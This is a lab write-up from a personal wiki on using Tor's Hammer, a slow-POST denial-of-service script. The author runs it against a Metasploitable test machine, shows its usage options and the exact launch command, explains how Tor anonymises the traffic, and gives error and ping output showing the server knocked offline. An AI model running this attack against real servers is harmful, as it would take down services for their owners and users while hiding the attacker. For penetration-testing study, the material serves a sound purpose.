From charlesreid1

Tor's Hammer is a Python script for creating denial of service attacks on websites. It is designed to be used through the Tor traffic anonymization tool.

Tor's Hammer Slow Body DoS Attack

Tor's Hammer (https://sourceforge.net/projects/torshammer/) is a tool that uses the slow body attack to swamp Apache servers and cause a denial of service DoS. It does this by sending a POST request with a large declared content-length (like 1000 MB), then performing the following, ad infinitum: send one letter through the open connection; take a nap.

Tor's Hammer, in particular, provides a Python script that enables running the slow body attack through a web proxy like Tor, to provide anonymity. It also implements other disguising elements like a slew of User Agent headers.

We'll test this tool out on the Metasploitable machine, which is running Apache 2.2.8, and see if it is vulnerable to the Tor's Hammer DoS attack. If so, we'll mount the attack.

NOTE: This will completely knock out the target server. The web server will run out of memory and will begin to drop packets from the device. It must be rebooted to fix. Use wisely.

Python Script

To run this attack, use the torshammer.py script from the link above.

$ python torshammer.py

/*
 * Tor's Hammer
 * Slow POST DoS Testing Tool
 * Version 1.0 Beta
 * Anon-ymized via Tor
 */
./torshammer.py -t <target> [-r <threads> -p <port> -T -h]
 -t|--target <Hostname|IP>
 -r|--threads <Number of threads> Defaults to 256
 -p|--port <Web Server Port> Defaults to 80
 -T|--tor Enable anonymising through tor on 127.0.0.1:9050
 -h|--help Shows this help

Eg. ./torshammer.py -t 192.168.1.100 -r 256

Run this against the IP address of the Metasploitable machine, 10.0.0.27:

# python torshammer.py -t 10.0.0.27

This will run with the default number of threads (256).

Results

This works like a charm, bringing the target 10.0.0.27 to its knees:

TorsHammer.png

Bingo!

Note that there are a large number of errors printed,

error: [Errno 24] Too many open files
Thread broken, restarting...
Exception in thread Thread-1:
Traceback (most recent call last):
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner
  File "torshammer.py", line 112, in run
  File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__
error: [Errno 24] Too many open files
Thread broken, restarting...
Exception in thread Thread-65:
Traceback (most recent call last):
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner
  File "torshammer.py", line 112, in run
  File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__
error: [Errno 24] Too many open files
Thread broken, restarting...
Exception in thread Thread-17:
Traceback (most recent call last):
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner
  File "torshammer.py", line 112, in run
  File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__

However, these don't seem to affect the attack, as the web server is inaccessible even while the error messages are being printed out.

Bringing Down The Server

Ping Down

At some point during the attack, the machine stopped responding to ping:

ping: sendto: Host is down
Request timeout for icmp_seq 874
ping: sendto: Host is down
Request timeout for icmp_seq 875
ping: sendto: Host is down
Request timeout for icmp_seq 876
ping: sendto: Host is down
Request timeout for icmp_seq 877
ping: sendto: Host is down
Request timeout for icmp_seq 878
ping: sendto: Host is down
Request timeout for icmp_seq 879
ping: sendto: Host is down
Request timeout for icmp_seq 880
ping: sendto: Host is down
Request timeout for icmp_seq 881
ping: sendto: Host is down
Request timeout for icmp_seq 882
ping: sendto: Host is down
Request timeout for icmp_seq 883
ping: sendto: Host is down
Request timeout for icmp_seq 884
ping: sendto: Host is down
Request timeout for icmp_seq 885
ping: sendto: Host is down
Request timeout for icmp_seq 886
ping: sendto: Host is down
Request timeout for icmp_seq 887
ping: sendto: Host is down
Request timeout for icmp_seq 888
ping: sendto: Host is down
Request timeout for icmp_seq 889
ping: sendto: Host is down
Request timeout for icmp_seq 890
ping: sendto: Host is down
Request timeout for icmp_seq 891
ping: sendto: Host is down
Request timeout for icmp_seq 892
Request timeout for icmp_seq 893
Request timeout for icmp_seq 894
Request timeout for icmp_seq 895
Request timeout for icmp_seq 896
Request timeout for icmp_seq 897
Request timeout for icmp_seq 898
Request timeout for icmp_seq 899
Request timeout for icmp_seq 900
Request timeout for icmp_seq 901
Request timeout for icmp_seq 902
Request timeout for icmp_seq 903
Request timeout for icmp_seq 904
Request timeout for icmp_seq 905
Request timeout for icmp_seq 906
Request timeout for icmp_seq 907

Memory Squeeze

Turns out, the machine ran out of memory, and the network device began dropping packets:

This attack completely knocked the server offline, and it had to be rebooted.

TorsHammer OfflineMemSqueeze.png

pwn

To be sure: this attack can pwn a server.

Flags

DoS






Metasploitable